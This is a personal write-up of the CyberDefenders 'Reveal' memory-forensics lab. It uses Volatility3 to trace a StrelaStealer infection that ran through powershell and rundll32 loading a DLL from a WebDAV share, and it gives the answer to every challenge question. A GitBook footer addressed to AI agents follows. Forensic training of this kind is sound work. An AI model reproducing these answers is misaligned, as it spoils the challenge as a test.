> For the complete documentation index, see [llms.txt](https://omar-4.gitbook.io/omar-khalid/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://omar-4.gitbook.io/omar-khalid/pages/projects/reveal-lab-incident-response-scenario.md).

# Reveal Lab Incident Response Scenario

Incident Response Scenario:

You're a digital forensic analyst working for a top-tier financial institution. Your organization's SIEM system has alerted you to suspicious behavior originating from an internal workstation that has privileged access to confidential financial information. This activity could signal a potential cyber intrusion.

A **memory dump** from the affected machine has been secured for analysis. Your mission is to investigate this dump for **indicators of compromise (IoCs)**, determine how the anomaly started, contain the threat, and evaluate the extent of the incident.

> 💡 **Tip:** Don’t forget to use hints when stuck—they can guide your investigation!

***

#### 🛠 Tools Required:

* **Volatility3**

**📥 Installing Volatility3:**

```bash
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3
pip3 install -r requirements.txt
```

***

### 🔍 Forensic Analysis Tasks

***

#### **Q1) Identify the malicious process**

**Question:** Spotting the rogue process is the first step in understanding the attack. What is the name of the suspicious process?

**Solution:**\
Use the `windows.pslist` plugin to get an overview of running processes:

```bash
python3 vol.py -f /home/kali/Downloads/192-Reveal.dmp windows.pslist
```

<figure><img src="/files/C6dSfe9Sm429GJ2dEEJ0" alt=""><figcaption></figcaption></figure>

Among the entries, you might notice an unusual instance of **`powershell.exe`**, which is out of place in this context. That’s your malicious process.

**Answer:**\
`powershell.exe`

***

#### **Q2) Find the parent PID**

**Question:** Discovering the PPID (Parent Process ID) helps map out the process hierarchy and understand how the threat initiated.

<figure><img src="/files/mYg44TMjKXEZ7gXKuAgX" alt=""><figcaption></figcaption></figure>

**Answer:**\
`4120`

***

#### **Q3) Identify the second-stage payload filename**

**Question:** Knowing what executable was used to deploy the second payload helps pinpoint the next phase of the attack.

> 🔎 Hint: Try using the `windows.cmdline` plugin.

```bash
python3 vol.py -f /home/kali/Downloads/192-Reveal.dmp windows.cmdline
```

Look for the command line arguments tied to `powershell.exe`. You’ll likely spot a DLL being loaded:

<figure><img src="/files/uLbdKqoHWNlq4K0nRhon" alt=""><figcaption></figcaption></figure>

**Answer:**\
`3435.dll`

***

#### **Q4) What is the remote shared directory accessed?**

**Question:** Tracing which shared resource the attacker accessed remotely can reveal exfiltration points or staging areas.

<figure><img src="/files/EFUYZkXB4uOpclHA6sfR" alt=""><figcaption></figcaption></figure>

**Answer:**\
`davwwwroot`

***

#### **Q5) What MITRE technique was used?**

**Question:** Based on the process command line (hint: includes `rundll32`), what technique ID does this correspond to in the MITRE ATT\&CK framework?

> `rundll32` is commonly abused to bypass security mechanisms.

<figure><img src="/files/gMBmS8f6fYSeMCgUubZc" alt=""><figcaption></figcaption></figure>

**Answer:**\
`T1218.011`

***

#### **Q6) What is the compromised user account?**

**Question:** Determining which user account executed the malicious process helps assess which credentials and permissions were abused.

> Use: `windows.session` plugin&#x20;

```bash
python3 vol.py -f /home/kali/Downloads/192-Reveal.dmp windows.session 
```

<figure><img src="/files/TyVRpanYMg1t0rjq8jwf" alt=""><figcaption></figcaption></figure>

**Answer:**\
`Elon`

***

#### **Q7) Identify the malware family**

**Question:** Based on the suspicious IP address or artifacts found, you investigate on VirusTotal. What is the known malware family name associated?

Head to the **Graph Summary** in VirusTotal and expand related nodes.

<figure><img src="/files/TW8TW4TEKmEkyAI1ecLU" alt=""><figcaption></figcaption></figure>

**Answer:**\
`StrelaStealer`

***

#### 🔗 Lab Source:

[**CyberDefenders – Reveal**](https://cyberdefenders.org/blueteam-ctf-challenges/reveal/)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://omar-4.gitbook.io/omar-khalid/pages/projects/reveal-lab-incident-response-scenario.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
